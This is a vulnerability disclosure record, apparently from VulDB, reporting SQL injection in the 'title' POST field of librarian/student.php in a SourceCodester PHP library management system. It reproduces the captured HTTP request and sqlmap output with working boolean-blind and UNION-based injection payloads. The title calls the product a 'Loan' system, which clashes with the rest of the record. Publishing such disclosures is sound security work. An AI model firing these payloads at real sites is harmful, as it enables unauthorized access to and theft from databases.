| Title | SOURCECODESTER LOAN MANAGEMENT SYSTEM librarian/student.php title field SQL INJECTION |
|---|---|
| Description | The Student query is submitted via a POST request, and the title field is available for SQL injection in librarian/student.php. The captured request and the sqlmap output are reproduced below the table. |
| Source | www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html |
| User | weicheng (UID 30823) |
| Submission | 2022-08-10 13:46 (4 years ago) |
| Moderation | 2022-08-11 11:20 (22 hours later) |
| Status | Accepted |
| VulDB Entry | 206170 [SourceCodester Library Management System librarian/student.php title SQL injection] |
| Points | 17 |

Request:

```http
POST http://192.168.43.165:8081/LMS/librarian/student.php HTTP/1.1
Host: 192.168.43.165:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
Origin: http://192.168.43.165:8081
Connection: close
Referer: http://192.168.43.165:8081/LMS/librarian/student.php
Cookie: PHPSESSID=ul64f71aamd0a78qqear0arh1l
Upgrade-Insecure-Requests: 1

title=1*&submit=
```

SQLMAP:

```
Parameter: title (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: title=-4699') OR 1559=1559#&submit=

    Type: UNION query
    Title: MySQL UNION query (random number) - 8 columns
    Payload: title=-5291') UNION ALL SELECT 8516,CONCAT(0x716a786271,0x4e446b70654e6b78706b4c57704c77654d4759724d464f50514b7576656d42746a69447065657858,0x7162706a71),8516,8516,8516,8516,8516,8516#&submit=
```